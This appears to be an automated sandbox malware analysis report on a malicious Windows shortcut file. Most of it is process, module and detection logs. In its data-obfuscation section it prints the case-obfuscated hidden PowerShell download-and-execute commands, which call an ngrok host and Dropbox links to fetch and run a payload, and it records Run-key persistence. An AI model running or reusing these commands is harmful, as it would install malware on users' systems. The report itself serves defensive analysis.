                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: k7rn7l32.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: ntd3ll.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                    Source: qxjDerXRGR.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: wkernel32.pdb source: 111392827.exe, 00000018.00000003.2638528309.0000000002EA0000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2638367786.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644916290.0000000005500000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644772476.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: 111392827.exe, 00000018.00000003.2636412906.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2636644786.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643153256.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2642593564.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 111392827.exe, 00000018.00000003.2637136208.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2637912190.0000000002F20000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643951128.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb`Il source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: ntdll.pdbUGP source: 111392827.exe, 00000018.00000003.2636412906.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2636644786.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643153256.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2642593564.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 111392827.exe, 00000018.00000003.2637136208.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2637912190.0000000002F20000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643951128.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: 111392827.exe, 00000018.00000003.2638528309.0000000002EA0000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2638367786.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644916290.0000000005500000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644772476.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmp

                    Data Obfuscation

                    barindex
                    PowerShell case anomaly found
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004150A0 GetModuleHandleW,LoadLibraryW,GetProcAddress,22_2_004150A0
                    Source: 111392827.exe.16.drStatic PE information: real checksum: 0xf661c should be: 0x1c6367
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0050E58E push ecx; ret 22_2_0050E5A1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00473991 push ecx; ret 22_2_004739A4
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00433FF1 push ss; retf 22_2_00433FF2
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060B8EC push edi; ret 24_3_0060B8F8
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060A0F9 push FFFFFF82h; iretd 24_3_0060A0FB
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_00608904 push ecx; ret 24_3_00608917
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060B1DC push eax; ret 24_3_0060B1DD
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060D2FB push edi; ret 24_3_0060D2CC
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060BC39 push ecx; ret 24_3_0060BC59
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060DD01 push esi; ret 24_3_0060DD6A
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060FE8F push esi; ret 24_3_0060FEA1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_00609F6A push eax; ret 24_3_00609F75
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043B01B pushfd ; ret 24_2_0043B14E
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0044C190 pushfd ; iretd 24_2_0044C1EF
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0044B2B0 pushfd ; ret 24_2_0044B2CA
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043A49C push esp; ret 24_2_0043A6C7
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00473991 push ecx; ret 24_2_004739A4
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043BA97 pushfd ; retf 24_2_0043BB03
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043BB04 pushfd ; iretd 24_2_0043BB09
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043BBC0 pushfd ; iretd 24_2_0043BBC1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00434CDF pushfd ; retf 24_2_0044287B
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0044BC80 pushfd ; iretd 24_2_0044BCE7
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043ED50 pushfd ; retf 24_2_0043ED5C
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043ADCC pushfd ; retf 24_2_0043ADD9
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00439DF3 pushfd ; ret 24_2_00439E59
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00439E72 pushfd ; iretd 24_2_00439EA1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043AF23 pushfd ; iretd 24_2_0043AF27
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00433FF1 push ss; retf 24_2_00433FF2
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00437FA3 pushfd ; iretd 24_2_00439EA1
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 25_3_03006F0F push esi; ret 25_3_03006F21
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 25_3_0300296C push edi; ret 25_3_03002978

                    Persistence and Installation Behavior

                    barindex
                    Windows shortcut file (LNK) starts blacklisted processes
                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Drops PE files to the document folder of the user
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeFile created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeFile created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\111392827.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004112B7 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_004112B7
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004112B9 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_004112B9
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004112B7 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_004112B7
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004112B9 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_004112B9
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0041B4B0 OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceStatus,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceW,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_0041B4B0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0041F8D0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,22_2_0041F8D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00420B40 IsIconic,22_2_00420B40
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0041F8D0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,24_2_0041F8D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00420B40 IsIconic,24_2_00420B40
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
